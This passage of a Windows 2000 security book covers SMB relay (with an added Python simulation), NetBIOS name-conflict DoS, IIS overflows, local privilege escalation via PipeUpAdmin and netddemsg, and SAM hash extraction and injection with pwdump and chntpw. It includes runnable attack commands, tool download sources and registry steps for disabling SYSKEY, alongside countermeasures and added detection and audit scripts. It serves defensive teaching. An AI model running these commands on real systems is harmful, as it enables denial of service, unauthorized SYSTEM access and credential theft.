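To make the relay flow and the effect of the "always" signing settings concrete, here is an added toy model (not code from the book or from SMBRelay) of the MITM attack described above and of the countermeasure just listed. HMAC-SHA256 stands in for the real LM/NTLM DES-based challenge-response and for the MD5-based SMB signature, and the message flow is the point, not the primitives: the relay reuses the target's challenge with the victim, forwards the victim's response unchanged while claiming no signing support, and then issues commands on the hijacked session. Whether the target accepts them depends only on whether it requires signing, because the signing key is derived from the password hash, which the relay never sees.

```python
import hashlib
import hmac
import os


def password_hash(password):
    """Stand-in for the NT hash (really MD4 over the UTF-16LE password)."""
    return hashlib.sha256(password.encode("utf-16le")).digest()


def challenge_response(pw_hash, challenge):
    """What the client sends in SMB_COM_SESSION_SETUP_ANDX (stand-in for the 24-byte response)."""
    return hmac.new(pw_hash, challenge, hashlib.sha256).digest()


def session_key(pw_hash, resp):
    """Both legitimate ends derive this; a relay that only saw resp cannot."""
    return hmac.new(pw_hash, b"session-key" + resp, hashlib.sha256).digest()


def sign(key, msg):
    """SMB signing: a MAC over every block, keyed with the session key."""
    return hmac.new(key, msg, hashlib.sha256).digest()[:8]


class Target:
    """The real server; require_signing models 'Digitally sign server communications (always)'."""

    def __init__(self, accounts, require_signing):
        self.accounts = accounts            # user -> password hash
        self.require_signing = require_signing
        self.sessions = {}                  # challenge -> signing key (None = unsigned session)

    def negotiate(self):
        chal = os.urandom(8)                # the SMB_COM_NEGOTIATE reply carries the challenge
        self.sessions[chal] = None
        return chal, self.require_signing

    def session_setup(self, chal, user, resp, client_signs):
        if chal not in self.sessions or user not in self.accounts:
            return None
        pw_hash = self.accounts[user]
        if not hmac.compare_digest(resp, challenge_response(pw_hash, chal)):
            return None                     # logon failure (0xC000006D style)
        if self.require_signing or client_signs:
            self.sessions[chal] = session_key(pw_hash, resp)
        return chal                         # session id

    def command(self, sid, msg, sig):
        key = self.sessions.get(sid)
        if key is None:
            return "OK"                     # unsigned session: nothing to check
        return "OK" if hmac.compare_digest(sig, sign(key, msg)) else "REJECT"


class Client:
    """A victim or legitimate client; signs 'when possible' (the Windows 2000 default)."""

    def __init__(self, user, password, signs_when_possible=True):
        self.user, self.pw_hash, self.signs = user, password_hash(password), signs_when_possible

    def connect(self, server):
        chal, server_requires = server.negotiate()
        resp = challenge_response(self.pw_hash, chal)
        sid = server.session_setup(chal, self.user, resp, self.signs)
        key = session_key(self.pw_hash, resp) if (server_requires or self.signs) else None
        return sid, key


class Relay:
    """SMBRelay-style MITM: a server to the victim, a client to the target."""

    def __init__(self, target):
        self.target, self.hijacked = target, None

    def negotiate(self):
        chal, _ = self.target.negotiate()   # reuse the target's challenge
        return chal, False                  # "Disabling security signatures"

    def session_setup(self, chal, user, resp, client_signs):
        self.hijacked = self.target.session_setup(chal, user, resp, False)
        return None                         # the victim sees its connection drop (error 64)

    def run_command(self, msg):
        return self.target.command(self.hijacked, msg, b"")


def relay_attack(require_signing):
    """Lure a victim through the relay, then use the hijacked session against the target."""
    target = Target({"Administrator": password_hash("s3cret")}, require_signing)  # assumed account
    relay = Relay(target)
    Client("Administrator", "s3cret").connect(relay)
    return relay.run_command(b"tree_connect \\\\TARGET\\C$")


def legitimate_session(require_signing=True):
    target = Target({"Administrator": password_hash("s3cret")}, require_signing)
    sid, key = Client("Administrator", "s3cret").connect(target)
    msg = b"tree_connect \\\\TARGET\\C$"
    return target.command(sid, msg, sign(key, msg))


if __name__ == "__main__":
    print("signing optional:", relay_attack(False))   # relay gets in
    print("signing required:", relay_attack(True))    # relay is rejected
```

Note what "when possible" buys you here: nothing, since the relay simply announces that signing is not possible. Only the server-side "always" setting leaves the relayed session unusable, which is why the text singles out that parameter.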


Attacking IIS 5

If any attack currently rivals or exceeds NetBIOS and SMB/CIFS in popularity, it is penetration through Internet Information Server (IIS), a reliable avenue into Internet-connected NT/2000 systems. The Windows 2000 Server products install IIS 5.0 with the Web service enabled by default. Although we examine Web attack techniques in detail in Chapter 15, you should be aware that this critical entry point into the operating system is very likely standing wide open. Note: See Hacking Exposed Windows 2000 for a complete treatment of the attacks and the proactive countermeasures.

Remote Buffer Overflows

In Chapter 5 we discussed Win32 buffer overflows and cited several sources for further reading. The most dangerous buffer overflows in Windows 2000 are IIS-related: the Internet Printing Protocol ISAPI DLL overflow (MS01-023), the Index Server ISAPI DLL exploit (MS01-033) and the FrontPage Server Extensions subcomponent attack (MS01-035), all of which are covered in Chapter 15.

DENIAL OF SERVICE

Because most NT denial-of-service (DoS) attacks were fixed by NT4 Service Pack 6a, Windows 2000 is relatively robust in this area. Nothing is immune to DoS, however, as we discuss next. Our coverage of Windows 2000 DoS attacks is divided into two parts: TCP/IP attacks and NetBIOS attacks.

Windows 2000 TCP/IP DoS Attacks

This is a fact of life on the Internet front: resource exhaustion. Win2000test.com found that the Internet pays no attention to good manners; although the test rules forbade DoS attacks outright, the server in that exercise was hit with heavy IP fragmentation attacks that exceeded its ability to reassemble packets, as well as SYN floods that filled the TCP/IP stack's queue of half-open connections. (See Chapter 12 for details.)

TCP/IP DoS Countermeasures

Configuring network gateway devices or protective software to deflect most, if not all, of these attacks is the primary countermeasure (see Chapter 12 for details). As we keep saying, however, configuring individual hosts to withstand direct attack is a good idea in case one layer of defense fails.


Largely as a result of the Win2000test.com experience, Microsoft has added several Registry keys to Windows 2000 that can be used to harden the TCP/IP stack further against DoS attacks. Table 6-3 summarizes how the Win2000test.com team configured the DoS-related Registry settings on its server. (The table is adapted from Microsoft's white paper on the Win2000test.com experience, available at http://www.microsoft.com/security, and from private communication with the Win2000test.com team.)

Table 6-3. Recommended NT/2000 TCP/IP stack settings to limit Denial of Service attacks. All keys are relative to HKLM\SYSTEM\CurrentControlSet\Services.

Key: Tcpip\Parameters\SynAttackProtect
Recommended value: 2
Description: Causes TCP to adjust the retransmission of SYN-ACKs so that connection responses time out more quickly if a SYN attack appears to be in progress. The determination is based on the current TcpMaxPortsExhausted, TcpMaxHalfOpen, and TcpMaxHalfOpenRetried values. A value of 2 offers the best protection against SYN attacks but can cause connectivity problems for users on high-latency paths. In addition, the following options will not work when the parameter is set to 2: window scaling (RFC 1323) and per-adapter TCP parameters (initial RTT, window size).

Key: Tcpip\Parameters\EnableDeadGWDetect
Recommended value: 0
Description: When this parameter is 1, TCP is allowed to perform dead-gateway detection, switching to a backup gateway if a number of connections run into difficulty. Backup gateways can be defined in the Advanced section of the TCP/IP configuration dialog in the Network Control Panel. Set it to 0 so that an attacker cannot force the host over to a less desirable gateway.

Key: Tcpip\Parameters\EnablePMTUDiscovery
Recommended value: 0
Description: When set to 1 (True), TCP attempts to discover the maximum transmission unit (MTU, the largest packet size) over the path to a remote host. By discovering the path MTU and limiting TCP segments to that size, TCP avoids fragmentation at routers along the path that join networks with different MTUs. Fragmentation hurts TCP throughput and worsens congestion. Setting the parameter to 0 causes an MTU of 576 bytes to be used for all connections except those to hosts on the local subnet, and prevents an attacker from forcing the MTU down to a very small value in an attempt to overwork the stack.

Key: Tcpip\Parameters\KeepAliveTime
Recommended value: 300,000 (5 minutes)
Description: Controls how often TCP tries to verify that an idle connection is still intact by sending a keep-alive packet. If the remote system is still reachable and functioning, it acknowledges the keep-alive. Keep-alive packets are not sent by default; an application can enable the feature on a connection. This is a global setting that applies to all interfaces and may be too short for adapters used for management or for redundancy-state detection.

Key: Tcpip\Parameters\Interfaces\<interface>\NoNameReleaseOnDemand
Recommended value: 0
Description: Determines whether the computer releases its NetBIOS name when it receives a name-release request from the network. A value of 0 protects against malicious name-release attacks (see Microsoft Security Bulletin MS00-047). It is unclear what effect, if any, such an attack can have on an interface where NetBIOS/SMB/CIFS has been disabled, as discussed earlier in the chapter.

Key: Tcpip\Parameters\Interfaces\<interface>\PerformRouterDiscovery
Recommended value: 0
Description: Controls whether Windows NT/2000 attempts RFC 1256 router discovery on a per-interface basis. A value of 0 prevents attacks using bogus routers. Use the values under Tcpip\Parameters\Adapters to work out which interface value corresponds to which network adapter.

WARNING: Some values in Table 6-3, such as SynAttackProtect=2, may be too aggressive for some environments. These settings are presented to protect a heavily loaded Internet server. See KB article Q142641 for more details on the SynAttackProtect setting and these parameters.

NetBIOS DoS Attacks

In June 2000, Sir Dystic of the Cult of the Dead Cow (http://www.cultdeadcow.com) reported that sending a NetBIOS Name Release message to the NetBIOS Name Service (NBNS, UDP 137) on an NT/2000 machine forces it to place its name in conflict, so that the system can no longer use that name. This severely hampers the machine's participation in the NetBIOS network. At the same time, Network Associates' COVERT Labs (http://www.nai.com) found that an attacker can send the NetBIOS Name Service a NetBIOS Name Conflict message even when the receiving machine is not in the process of registering a NetBIOS name. This likewise places the name in conflict, makes it unusable, and severely hampers the system's participation in the NetBIOS network. Sir Dystic wrote a tool called nbname that can send an NBNS Name Release packet to every entry in a machine's NetBIOS name table. Here is an example of using nbname to DoS a single host. Under Windows 2000 you must first disable NetBIOS over TCP/IP, to avoid a conflict with the NBNS service, which normally holds UDP 137 itself. Then run nbname as shown. (Replace 192.168.234.222 with the IP address of the host you want to DoS.)

C:\>nbname /astat 192.168.234.222 /conflict


NBName v2.51 Decodes and displays NetBIOS Name traffic (UDP 137), with options
Copyright 2000: Sir Dystic, Cult of the Dead Cow -:/:- New Hack City
Send complaits, ideas and donations to sd@cultdeadcow.com/sd@newhackcity.net
WinSock v2,0 (v2.2) WinSock 2.0
WinSock status: Running
Bound to port 137 on address 192.168.234.244
Broadcast address: 192.168.234.255 Netmask: 255.255.255.0
**** NBSTAT QUERY packet sent to 192.168.234.222
waiting for packets
** Received 301 bytes from 192.168.234.222.137 via local net at web jun 20 15:46:12 200
OPCode: QUERY Flags: Response Authoratative Answer
Answer[0] <00> Node Status Resoure Rocord:
MANDALAY <00> ACTIVE UNIQUE NOTPERM INCONFLICT NOTDEREGED B-NODE
MANDALAY <00> ACTIVE GROUP NOTPERM NOCONFLICT NOTDEREGED B-NODE
**** Name release sent to 192.168.234.222.
(etc.)

The /ASTAT switch retrieves the remote adapter status from the victim, and /CONFLICT sends name-release packets for every name in the remote machine's name table, which the machine hands over in its reply to the adapter status request. An attacker can DoS an entire network by using the switches /QUERY (IP name) /CONFLICT /DENY (name_or_IP). An attacked host may show the following symptoms:

- Intermittent network connectivity problems
- Tools such as Network Neighborhood malfunction
- The net send command and its equivalents stop working
- An attacked domain controller cannot validate domain logons
- Shared resources and basic NetBIOS services such as NetBIOS name resolution cannot be reached

The nbtstat -n command may show a Conflict status beside the NetBIOS name service entries, something like this:


Local Area Connection:
Node IpAddress: (192.168.234.222) Scope Id: []

                NetBIOS Local Name Table

       Name               Type         Status
    ---------------------------------------------
    MANDALAY       <00>  UNIQUE      Conflict
    MANDALAYS      <00>  GROUP       Registered
    MANDALAYS      <1C>  GROUP       Registered
    MANDALAY       <20>  UNIQUE      Conflict
    MANDALAYS      <1E>  GROUP       Registered
    MANDALAYS      <1D>  UNIQUE      Conflict
    ..__MSBROWSE__.<01>  GROUP       Registered
    MANDALAYS      <1B>  UNIQUE      Conflict
    Inet~Servics   <1C>  GROUP       Registered
    IS~MANDALAY..  <00>  UNIQUE      Conflict

NBNS DoS Countermeasures

Blame IBM (where NetBIOS was invented). NetBIOS is an unauthenticated protocol, period. Microsoft's patch creates a Registry value that stops the NetBIOS Name Service from honoring Name Release messages. The Name Conflict patch only makes the service honor NBNS Name Conflict messages during the registration phase; during that window the machine can still be attacked. The patches and further information are available at http://www.microsoft.com/technet/security/bulletin/MS00-047.asp. This hotfix is not part of SP1, so it can be applied to both pre- and post-SP1 systems. Naturally, the long-term solution is to migrate away from NetBIOS in environments where this kind of harassment is likely. And of course, always make sure that UDP 137 cannot be reached from outside the protected zone.

PRIVILEGE ESCALATION

Once attackers get a foothold on a Windows 2000 host, they immediately try to obtain the one privilege that matters: the Administrator account. Fortunately, Windows 2000 stands up to these attacks better than its predecessors did (it is far less exposed to the kind of exploits that plagued earlier versions, such as the admin and sechole exploits, for which hotfixes were issued). The danger is that once attackers gain interactive logon privileges, the ability to prevent privilege escalation is very limited. (Interactive logon will become much more widespread as Windows 2000 Terminal Server becomes popular for remote management and for concentrating processing power.) Here we look at two examples.
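Before moving on to privilege escalation, here is an added Python helper (not from the book) for the nbtstat -n output shown in the NetBIOS DoS section above. It parses the local name table, lists the names whose status is Conflict, and maps the suffixes to the services that are now unreachable by name. A single Conflict entry can be a genuine duplicate name on the LAN; several UNIQUE names in conflict at once, on a host that should not share its name with anyone, is the signature the nbname-style flood leaves behind. The sample output is constructed to mirror the table above.

```python
"""Detection helper for the NBNS name-release/name-conflict attack.

Added example, not from the book: parses the text of `nbtstat -n` and flags
names whose Status is Conflict, which is what a successful NetBIOS Name
Release or Name Conflict flood leaves behind on the victim.
"""
import re

# Meaning of the NetBIOS name suffixes that appear in the sample table.
SUFFIX = {
    "00": "Workstation service (computer or domain name)",
    "01": "Master browser",
    "1B": "Domain master browser",
    "1C": "Domain controllers group",
    "1D": "Master browser",
    "1E": "Browser service elections",
    "20": "File/print server service",
}

# One table row: name, <hex suffix>, UNIQUE|GROUP, status word.
_ROW = re.compile(r"^\s*(.+?)\s*<([0-9A-Fa-f]{2})>\s+(UNIQUE|GROUP)\s+(\S+)\s*$")


def parse_nbtstat(text):
    """Return (name, suffix, type, status) tuples for every row of the local name table."""
    rows = []
    for line in text.splitlines():
        m = _ROW.match(line)
        if m:
            name, suffix, ntype, status = m.groups()
            rows.append((name, suffix.upper(), ntype, status))
    return rows


def conflicted_names(rows):
    """Names the host has lost: with status Conflict it no longer answers queries for them."""
    return [(name, suffix) for name, suffix, _ntype, status in rows if status.lower() == "conflict"]


def assess(text):
    """Summarize the damage: how many unique names are in conflict and which services that hits."""
    rows = parse_nbtstat(text)
    lost = conflicted_names(rows)
    return {
        "total_names": len(rows),
        "conflicts": lost,
        "unique_in_conflict": sum(1 for _n, _s, ntype, st in rows
                                  if ntype == "UNIQUE" and st.lower() == "conflict"),
        "services_affected": sorted({SUFFIX.get(s, "unknown suffix " + s) for _n, s in lost}),
    }


# Constructed sample, mirroring the nbtstat -n output shown in the text.
SAMPLE_NBTSTAT = """\
Local Area Connection:
Node IpAddress: [192.168.234.222] Scope Id: []

                NetBIOS Local Name Table

       Name               Type         Status
    ---------------------------------------------
    MANDALAY       <00>  UNIQUE      Conflict
    MANDALAYS      <00>  GROUP       Registered
    MANDALAYS      <1C>  GROUP       Registered
    MANDALAY       <20>  UNIQUE      Conflict
    MANDALAYS      <1E>  GROUP       Registered
    MANDALAYS      <1D>  UNIQUE      Conflict
    ..__MSBROWSE__.<01>  GROUP       Registered
    MANDALAYS      <1B>  UNIQUE      Conflict
    Inet~Services  <1C>  GROUP       Registered
    IS~MANDALAY....<00>  UNIQUE      Conflict
"""

if __name__ == "__main__":
    report = assess(SAMPLE_NBTSTAT)
    print(f"{report['unique_in_conflict']} of {report['total_names']} names in conflict")
    for service in report["services_affected"]:
        print("  unreachable by name:", service)
```

On a monitored server, feeding the output of a scheduled `nbtstat -n` through `assess()` and alerting when `unique_in_conflict` is greater than zero catches the attack long before users start reporting that Network Neighborhood and net send have stopped working.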


Named Pipe Prediction to Run Code as SYSTEM

Popularity:   4
Simplicity:   7
Impact:      10
Risk Rating:  7

Discovered by Mike Schiffman and posted to Bugtraq (ID 1535), the predictability of the named pipes that Windows 2000 creates when starting system services (such as Server, Workstation, Alerter, and ClipBook, all of which log on under the SYSTEM account) was found to be a local privilege-escalation weakness. Before each service starts, a server-side named pipe is created with a predictable name. The name can be obtained from the Registry value HKLM\System\CurrentControlSet\Control\ServiceCurrent. Therefore any Windows 2000 user who can log on interactively (including remote Terminal Server users) can predict the name of the next named pipe, instantiate it, and impersonate the security context of SYSTEM the next time a service starts. Any code attached to the pipe then runs with SYSTEM privileges, which allows it to do anything to the local system (for example, add the current user to the Administrators group). Exploiting the named pipe predictability weakness is child's play with Maceo's PipeUpAdmin tool. PipeUpAdmin adds the current user's account to the local Administrators group, as shown in the example below. The example assumes that the user wongd has been authenticated and has interactive access to a command shell. Wongd is a member of the Server Operators group. First, wongd checks the membership of the all-powerful local Administrators group:

C:\>net localgroup administrators
Alias name     administrators
Comment        administrators have complete and unrestricted access to the Computer/domain

Members


-------------------------------------------------------------------------------
Administrator
The command completed successfully.

Next, wongd tries to add himself to Administrators, but is refused for lack of privilege:

C:\>net localgroup administrators wongd /add
System error 5 has occurred.

Access is denied.

Our hero wongd is not beaten yet, however. He downloads PipeUpAdmin from http://www.dogmile.com/files and runs it:

C:\>pipeupadmin
PipeUpAdmin
Maceo <maceo @dogmile.com>
Copyright 2000-2001 dogmile.com

The ClipBook service is not started.
More help is available by typing NET HELPMSG 3521.

Impersonating: SYSTEM
The account: FS-EVIL\wongd
has been added to the Administrators groups.

Wongd then runs net localgroup again and confirms that he is right where he wants to be:

C:\>net localgroup administrators
Alias name     administrators
Comment        administrators have complete and unrestricted access to the Computer/domain

Members
-------------------------------------------------------------------------------
Administrator
wongd
The command completed successfully.

Now all wongd has to do to exploit his Administrator-equivalent privileges is log off and log back on. Many privilege-escalation exploits require this, because Windows 2000 must rebuild the current user's access token to add the SID of the new group membership. The token could be refreshed by new API calls, or simply by logging off and logging on again. (See the discussion of tokens in Chapter 2.)


NOTE: The PipeUpAdmin tool must be run in the context of an INTERACTIVE user (that is, you must be logged on at the physical keyboard, or through a remote-control utility that grants INTERACTIVE status, such as Terminal Services). This prevents PipeUpAdmin from being run through remote-control utilities that present a token without the INTERACTIVE SID.

Fixing Named Pipe Predictability

Microsoft released a hotfix that changes how the Windows 2000 Service Control Manager (SCM) creates and assigns named pipes. Details are at http://www.microsoft.com/technet/security/bulletin/MS00-053.asp. The hotfix is not part of Service Pack 1 and can therefore be applied to both pre- and post-SP1 hosts. Of course, interactive logon rights should be restricted as far as possible on any system holding sensitive data, because exploits like this one become far easier once an attacker has gained that critical foothold. To review interactive logon rights under Windows 2000, run the Security Policy applet (local or group), find the Local Policies\User Rights Assignment node, and check how the Log On Locally right is configured. New in Windows 2000, many privileges now have a matching right that denies the privilege to specific groups or users. In this example you could use the Deny Log On Locally right, as shown here:

NOTE: By default, the Users group and the Guest account hold the Log On Locally right on Windows 2000 Professional and on non-domain-joined Windows 2000 servers. DCs are more restrictive because of the Default Domain Controllers policy shipped with the product (although all of the Operator groups hold the right there). We recommend removing Users and Guest in any case, and considering carefully which other groups can lose the right.
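The Log On Locally review just described can be scripted instead of clicked through. The added Python script below (not from the book) parses the security template that `secedit /export /cfg rights.inf /areas USER_RIGHTS` writes on a Windows 2000 host and flags the principals the note above says should not keep the right (the Users group, the Guests group, and the Guest account) unless they are also listed under Deny Log On Locally, which takes precedence. secedit writes resolvable accounts as `*SID`; the two sample templates and the domain SID in them are constructed, with the Guest account recognised by its fixed relative ID 501.

```python
"""Audit of interactive logon rights from a secedit security template.

Added example, not from the book. Input is the text of
`secedit /export /cfg rights.inf /areas USER_RIGHTS`; output is the list of
unwanted principals that can still log on locally.
"""
import re

# Well-known local group SIDs, identical on every NT/2000 installation.
WELL_KNOWN = {
    "S-1-5-32-544": "Administrators",
    "S-1-5-32-545": "Users",
    "S-1-5-32-546": "Guests",
    "S-1-5-32-547": "Power Users",
    "S-1-5-32-549": "Server Operators",
    "S-1-5-32-551": "Backup Operators",
}
# Principals the chapter recommends removing from Log On Locally.
UNWANTED = {"Users", "Guests", "Guest"}


def parse_secedit_inf(text):
    """Return {section: {setting: [principal, ...]}} for the INI-style template."""
    policy, section = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1]
            policy.setdefault(section, {})
        elif "=" in line and section is not None:
            name, _, value = line.partition("=")
            policy[section][name.strip()] = [p.strip() for p in value.split(",") if p.strip()]
    return policy


def principal_label(entry):
    """Map a *SID entry to a name where we can; unresolved names are kept verbatim."""
    if not entry.startswith("*"):
        return entry
    sid = entry[1:]
    if sid in WELL_KNOWN:
        return WELL_KNOWN[sid]
    if re.fullmatch(r"S-1-5-21-\d+-\d+-\d+-501", sid):
        return "Guest"  # RID 501 is the built-in Guest account of any machine or domain
    return sid


def interactive_logon_findings(policy):
    """Unwanted principals granted SeInteractiveLogonRight and not countered by the deny right."""
    rights = policy.get("Privilege Rights", {})
    allowed = [principal_label(p) for p in rights.get("SeInteractiveLogonRight", [])]
    denied = {principal_label(p) for p in rights.get("SeDenyInteractiveLogonRight", [])}
    return sorted(p for p in allowed if p in UNWANTED and p not in denied)


# Constructed templates; the S-1-5-21-... machine SID is made up.
DEFAULT_WORKSTATION = """\
[Unicode]
Unicode=yes
[Privilege Rights]
SeInteractiveLogonRight = *S-1-5-32-544,*S-1-5-32-551,*S-1-5-32-547,*S-1-5-32-545,*S-1-5-21-1234567890-1234567890-1234567890-501
SeDenyInteractiveLogonRight =
[Version]
signature="$CHICAGO$"
Revision=1
"""

HARDENED_WORKSTATION = DEFAULT_WORKSTATION.replace(
    "SeDenyInteractiveLogonRight =",
    "SeDenyInteractiveLogonRight = *S-1-5-32-545,*S-1-5-32-546,"
    "*S-1-5-21-1234567890-1234567890-1234567890-501")

if __name__ == "__main__":
    for label, template in (("default", DEFAULT_WORKSTATION), ("hardened", HARDENED_WORKSTATION)):
        print(label, "->", interactive_logon_findings(parse_secedit_inf(template)) or "clean")
```

The deny right is checked by label rather than by raw SID so that the Guest account, whose SID differs on every machine, is matched wherever it appears.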


Cross-Window Station Access Violation

Popularity:   4
Simplicity:   7
Impact:      10
Risk Rating:  7

Most Windows administrators are not familiar with window stations, probably one of the most obscure corners of Windows programming. The Windows 2000 security model defines a hierarchy of contexts that establish security boundaries among processes. From largest to smallest, the hierarchy is: Session, Window Station, and Desktop. A session contains one or more window stations, and a window station contains one or more desktops. By design, a process is confined to one window station, and the threads of the process run in one or more desktops. Because of an implementation flaw, however, this was not the case in the first release of Windows 2000. Under certain circumstances, a lower-privileged process running on one desktop could obtain information from a desktop in another window station within the same Session. As a result, an affected user logged on to Windows 2000 could interact with processes in the same Session. (Note that this does not let anyone interact with another user's Terminal Server logon, because those have separate Sessions.) They could also create a process in the other window station; it is not clear, however, what more they could do even if the process created had SYSTEM privileges. Even so, in rare cases an attacker could capture screen contents and keyboard input.

Window Station Countermeasures

Because this is an acknowledged flaw in Microsoft's implementation of the design, we must rely on the hotfix to correct it. The fix is applied to the desktop security model so that processes on different desktops are properly separated: http://www.microsoft.com/technet/security/bulletin/ms00-020.asp. This fix is included in SP1. Another workaround is to restrict interactive logon privileges (see the named pipe prediction section for details).

NetDDE Requests Run as SYSTEM

Popularity:   6
Simplicity:   7
Impact:      10
Risk Rating:  8


In February 2001, DilDog of @stake discovered a vulnerability in the Network Dynamic Data Exchange (NetDDE) service in Windows 2000 that lets a local client run any command with SYSTEM privileges. NetDDE is a technology that lets applications share data through trusted shares. A request can be issued through a trusted share to launch applications, which then run in the context of the SYSTEM account. @stake released proof-of-concept source code for a tool called netddemsg that automates this privilege-escalation technique.

TIP: The netddemsg source (netdde.cpp) from @stake requires nddeapi.lib to be linked in at compile time. In Visual C++, do this under Project/Settings/Link tab/Object/library modules: add a space and then type nddeapi.lib.

To run the exploit, first start the NetDDE service if it is not already running. Most user accounts lack the privilege to start a service, unlike members of the built-in Operator groups. You can start the NetDDE service from the command line, or through the Services MMC snap-in, most quickly by choosing Run and launching services.msc. If you then run netddemsg with no arguments, it prints its usage. Now run netddemsg, specifying the trusted share with the -s argument followed by the command to execute. Here cmd.exe is specified, so a command shell opens:

C:\>netddemsg -s Chat$ cmd.exe

Immediately after the command runs, a command shell pops up running in the SYSTEM context. You can run the Resource Kit whoami tool inside that shell to confirm that it really is running as SYSTEM. Note that, unlike the PipeUpAdmin exploit discussed in the previous section, netddemsg does not require the attacker to log off to refresh the token: the shell spawned by netddemsg runs as SYSTEM straight from the current logon session. Like PipeUpAdmin, however, netddemsg must be run in the context of an INTERACTIVE user (that is, you must be logged on at the physical keyboard, or through a remote-control utility that grants INTERACTIVE status, such as Terminal Services).


NetDDE Escalation Countermeasures

As with named pipe predictability, for an implementation flaw in the SYSTEM context like this one the only countermeasure is Microsoft's hotfix (http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/MS01-007.asp holds the details of the fix). We present some general countermeasures against privilege escalation in the next section. Note also that starting the NetDDE service can be audited if auditing is enabled; this is a good way to check whether someone is trying to use netddemsg against you.

PILFERING

Once Administrator-equivalent status is obtained, attackers set about grabbing as much further information as they can, since it can be leveraged for other attacks.

Grabbing Windows 2000 Password Hashes

Attackers are delighted to learn that the LanManager (LM) hash is still stored by default in Windows 2000, to provide backward compatibility with non-Windows NT/2000 clients. This default is the main enabler of the attacks discussed in Chapter 5, where the fix is also described. However, beyond that simple countermeasure, the standard techniques for gathering password hashes are somewhat limited by new Windows 2000 features, chiefly SYSKEY. Only somewhat, as we will see.

Grabbing the SAM

Popularity:   8
Simplicity:  10
Impact:      10
Risk Rating:  9

On Windows 2000 domain controllers, password hashes are stored in Active Directory (%windir%\NTDS\ntds.dit). With the default objects installed, this file is around 10 megabytes and in an obscure format, so attackers are unlikely to want to grab it for offline analysis. On non-domain-controllers, the Security Accounts Manager (SAM) file remains the target of choice, and grabbing the SAM works exactly as it did under NT 4. The SAM file is still stored in %systemroot%\system32\config and is still locked by the OS. Booting to DOS and grabbing the SAM can still be done on the new NTFS v5 file system using the NTFSDOS utility from http://www.sysinternals.com/. A copy of the SAM still appears in %systemroot%\repair (now named SAM instead of SAM._ as in NT 4), and it contains every user configured on the system at installation time. The rdisk utility has been folded into the Microsoft Backup v5 application (ntbackup.exe), which has a Create Emergency Repair Disk function. When Create Emergency Repair Disk is chosen, a dialog asks whether the information should also be copied to the repair directory, as shown here:

If that option is chosen, the Registry, including the SAM hive, is copied to the %windir%\repair\RegBack directory. Members of the Users group have Read access to that directory, and members of Power Users have Modify access, if the system drive is formatted NTFS; only Power Users have additional access to the files themselves, Users do not. SAM-copy attacks are mitigated somewhat because the file is SYSKEYed, and techniques for decrypting a SYSKEYed file (as opposed to pwdump2-ing a live SAM) have not appeared in the wild.

NOTE: The Windows 2000 SAM file is SYSKEYed by default (see below) and must be extracted with pwdump2 or pwdump3.

Keep Repair\RegBack Clean

Take no chances: move these files to removable media or to an alternative secure location, and do not leave them in the RegBack directory. Better still, do not choose Backup Registry Locally when running the Create Emergency Repair Disk utility.

Dumping Hashes with pwdumpX

Popularity:   8
Simplicity:  10
Impact:      10
Risk Rating:  9

SYSKEY is now the default configuration for Windows 2000 (see KB article Q14375 and Chapter 5 for more on SYSKEY). As a result, the pwdump tool cannot correctly extract password hashes from the Registry on Windows 2000 servers. The job requires pwdump2 (see Chapter 5 for more on pwdump and pwdump2, and why pwdump does not work against SYSKEY). Furthermore, extracting hashes locally from a domain controller requires the latest version of pwdump2 (from http://razor.bindview.com), because the hashes there live in Active Directory rather than in the SAM as before. e-business technology, inc. has released a version of Todd Sabin's original pwdump2 called pwdump3e (http://www.ebiztech.com/html/pwdump.html). pwdump3e installs the samdump DLL as a service in order to extract hashes remotely over SMB (TCP 139 or 445). pwdump3e does not work against the local system.

pwdumpX Countermeasures

There is no defense against pwdump2 or pwdump3e as long as DLL injection still works in Windows. However, pwdumpX requires Administrator privileges to run, and it must be run from the local network. If attackers have gained that much, they have already achieved their goal on the local system. (Using the SAM data to attack trusting systems, however, is a different matter.)

Injecting Hashes into the SAM with chntpw

Popularity:   8
Simplicity:  10
Impact:      10
Risk Rating:  9

If attackers gain physical access to a system, together with enough time to boot it into another operating system, they can carry out a sophisticated attack described by Petter Nordahl-Hagen at http://home.eunet.no/~pnordahl/ntpasswd/. Across the pages linked from that site, Petter makes several interesting claims, including:

Hashes can be injected into the SAM offline, allowing anyone to change the password of any user on that system.

Petter goes on to describe, and to supply the tools for building, a Linux boot floppy that can be used to boot an NT/2000 system, change the Administrator password (even if the account has been renamed), reboot, and then log on with the new password. Here is the interesting twist: the injection works even when SYSKEY is in use, and even when the password- or floppy-protected SYSKEY option has been chosen. Wait a second: we were told that SYSKEY applies a second, 128-bit round of encryption to the password hashes using a unique key stored in the Registry, optionally protected by a password or stored on a floppy (see Chapter 5). How can someone inject hashes without knowing the system key used to produce them? Petter found a way to turn SYSKEY off. More seriously, he found that this is not even necessary: old-style hashes injected into the SAM are converted to SYSKEYed form automatically the next time the system boots. Hats off to Petter for this piece of reverse engineering.

1. Set HKLM\System\CurrentControlSet\Control\Lsa\SecureBoot to 0 to disable SYSKEY (the possible values for this key are 0, disabled; 1, an unprotected key stored in the Registry; 2, a key protected by a password in the Registry; and 3, a key stored on floppy).

2. Change a flag in the HKLM\SAM\Domains\Account\F binary structure to a form similar to the SecureBoot value above. While the system is running, this key cannot be read.

3. On Windows 2000 only, the <default> value under HKLM\Security\Policy\PolSecretEncryptionKey must also be changed to match the two keys above.

According to Petter, changing only one of the first two values on NT4 up to SP6 produces an inconsistency between the SAM and the system settings when boot completes, and SYSKEY is re-enabled. On Windows 2000, an inconsistency among these three keys appears to be reset to the value of the first key on reboot.

WARNING: Using these techniques can corrupt the SAM or render it unusable. Test them only on NT/2000 installations that you are prepared to rebuild. In particular, do not choose the Disable SYSKEY option in chntpw on Windows 2000. Extremely harmful effects can result from this technique, and a complete reinstall is usually required.

NOTE: This technique does not change user account passwords on a Windows 2000 domain controller, because it targets only the SAM file. On DCs, the password hashes are stored in Active Directory, not in the SAM.


chntpw Countermeasures

Even when attackers have unrestricted physical access to a system, we still have a few countermeasures against this attack. The first thing to look at is setting SYSKEY so that it requires intervention at boot time, by entering a password or a system key from floppy (see Chapter 5 for details on SYSKEY's three modes). That way, even if attackers reset the Administrator password, they still have to enter the SYSKEY password to boot the system. Of course, attackers could still use chntpw to disable SYSKEY altogether, but they may wreck the target system if it is Windows 2000.

